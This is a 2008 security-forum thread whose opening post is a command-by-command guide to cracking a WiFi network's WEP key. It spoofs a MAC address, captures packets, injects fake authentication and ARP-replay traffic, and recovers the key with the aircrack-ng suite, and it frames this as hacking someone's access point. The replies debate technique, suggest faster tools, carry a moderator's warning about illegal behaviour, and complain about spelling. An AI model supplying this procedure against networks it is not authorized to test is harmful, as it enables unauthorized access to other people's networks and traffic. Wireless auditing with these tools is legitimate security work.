|
|||||||
| BackTrack3 Howtos Add your howto articles / tutorials here. |
 |
|
|
LinkBack | Thread Tools | Display Modes |
11-15-2008, 09:25 PM
|
|||
|
|||
WiFi Hacking 101
O.K folks, in this tut i am going to show you how to crack wep, Sniff non ssl & some ssl passwords over a wireless network & sniffing msn chats
Part. 1, Cracking WEP my way of cracking wep is a little different than other ways but it gets the job done quicker than everyone else's way so you will need backtrack 3 and a supported wifi card that can go into monitor mode (i have a ranlink 2500 card (ra0) ) open up a shell ok so 1st we need to stop our wireless card so we do the airmon command airmon-ng stop [wifi card extension e.g ath0] now lets change our mac address  macchanger --mac 00:11:22:33:44:55 [wifi card extension] now lets fire our card up in monitor mode airmon-ng start [wifi card extension] now we need the mac address of the AP we are hacking so lets do airodump-ng [wifi card extension] now you will see your AP. Take note of the mac address/ BSSID and the channel, now hit CTRL+C to stop airodump jumping channels or you will come into problems later on. now lets start capturing the data packets we need for the hack so type airodump-ng -c [channel] -b [bssid/ mac addres of AP] -w [filename] [wifi card extension] so for example airodump-ng -c 1 -b 01:1b:11:78:d9:f2 -w linksys ra0 once you have done that command you should see some info come up clients, mac address, channel, data ect now you should see the data filling up we need the data to get to about 10-15 thousand to crack the key so we need to speed it up we get a lot of data in a short space of time. we are now going to use aireplay so open up another shell and type aireplay-ng -1 -0 -a [AP mac address/ bssid] -h [faked mac address] [wifi card extension] for example aireplay-ng -1 0 -a 02:1b:11:78:d9:f2 -h 00:11:22:33:44:55 ra0 now once you see authentication successful proceed to replay a data packet to the access point which will force it to send out lots of packets we can use to crack the key so do, aireplay-ng -3 -p 0841 -c FF:FF:FF:FF:FF:FF -b [ap mac address/ bssid] -h [faked mac address] [wifi card extension] for example aireplay-ng -3 -p 0841 -c FF:FF:FF:FF:FF:FF -b 02:1b:11:78:d9:f2 -h 00:11:22:33:44:55 ra0 now aireplay will start reading the packets and once it finds one you can use for the hack it will prompt you to use that packet? just hit y then enter now on the airodump shell you will see the data filling up very fast ance it gets to 10,000 run this command: aircrack-ng -b [mac address/ bssid] [file name you used earlier +-01.cap] for example aircrack-ng -b 02:1b:11:78:d9:f2 linksys-01.cap and aircrack will start decrypting the packets/ IV's and find the wep key! if this is your first time doing wep cracking it should take about 10-20 mins at first and you will start progressing to 8 mins, 5 mins, 3 mins ect other tuts to follow! [[its 03:45am in the uk :O]] thanks for reading!! will also get some screen shots up tomorrow. Last edited by pureh@te; 11-16-2008 at 10:17 AM. 
|
|
11-16-2008, 02:33 AM
|
||||
|
||||
|
Quote:
__________________
Ask questions on the open forums, that way everybody benefits from the solution, and everybody can be corrected when they make mistakes. Don't send me private messages asking questions that should be asked on the open forums, I won't respond. I decline all "Friend Requests".
|
|
11-16-2008, 04:43 AM
|
|||
|
|||
|
Quote:
But other than that seems ok i guess. I just don't get how this guide is faster than other ones? Also there are so many similar guides, so why reinvent the wheel?Edit: In my opinion, the fastest way is wesside-ng or spoonwep
Last edited by pureh@te; 11-16-2008 at 08:20 AM.
|
|
11-16-2008, 07:21 AM
|
||||
|
||||
|
Quote:
 Other than that it seems like a solid write-up on one of the most basic attacks (ARP-replay) available in aireplay-ng.
__________________
-Monkeys are like nature's humans. Last edited by =Tron=; 11-16-2008 at 07:25 AM.
|
|
11-16-2008, 08:17 AM
|
||||
|
||||
|
Quote:
In every single WEP tutorial I have read I have never stumbled upon anyone that said to start replaying before the association. Does that really work? Does a fake association really generate arp packet's on the network? If so that would really speed up the process if no clients are connected.
__________________
- Poul Wittig
|
|
11-16-2008, 08:25 AM
|
||||
|
||||
|
I have edited the post and let the OP of with a warning on his discussion of illegal behavior because it was a borderline offense. What bothers me more is the lack of people using spell check on their posts so I have spell checked the original post and I would encourage people to use spell check and not use l33t speak or whatever the F**k its called if you want a intelligent response from any of the senior members here.
|
|
11-16-2008, 08:56 AM
|
||||
|
||||
|
Although the formatting is acceptable, I suggest that anyone that's including embedded commands inside of text, use the 'code' tags around those commands. It just makes it easier to read and follow.
...and the Shift key was invented for a reason.
__________________
A 3rd Party Security Audit is the IT equivalent of a Colonoscopy, it's long, intrusive, and when it's done you'll have seen a lot of things you really didn't want to see, and you'd definitely remember that you had it done. I ♣ baby harp seals.
|
|
11-16-2008, 12:58 PM
|
||||
|
||||
|
Quote:
 Put the stick away, you know I <3 you....
__________________
"The goal of every man should be to continue living even after he can no longer draw breath." ~ShadowKill
|
|
11-17-2008, 12:24 PM
|
|||
|
|||
|
Now Now ShadowKill you have to note Pureh@te did say "spell check" not grammar check :P
So with that pointed out ...... Did you really get him ?
|
|
11-17-2008, 06:03 PM
|
||||
|
||||
|
Quote:
__________________
"The goal of every man should be to continue living even after he can no longer draw breath." ~ShadowKill
|
|
| Bookmarks |
«
Previous Thread
|
Next Thread
»
| Thread Tools | |
| Display Modes | |
Linear Mode
|
|
All times are GMT. The time now is 03:26 PM.
